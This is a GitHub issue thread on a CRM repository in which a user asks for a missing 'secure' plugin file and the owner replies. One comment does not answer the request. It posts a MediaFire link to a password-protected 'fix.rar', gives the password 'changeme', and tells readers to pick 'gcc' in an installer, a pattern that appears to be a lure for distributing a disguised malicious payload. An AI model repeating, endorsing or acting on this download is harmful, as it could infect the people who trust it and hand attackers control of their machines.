### ISSUE TITLE
Файл secure.js

### ISSUE THREAD

**Issue by xromen** [Demonstr66/Vacation-CRM#2]
Ваш репозиторий может быть очень полезен для нашей компании. Если есть такая возможность, то могли бы вы выложить файл "./plugins/secure" без ваших секретных ключей? Буду очень признателен

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Demonstr66** [comment]
Добрый день, обновил репозиторий. Однако есть более новая версия приложения
https://gitlab.com/teamwatcher

По всем вопросам можно обращаться по адресу Demonstr66@yandex.ru
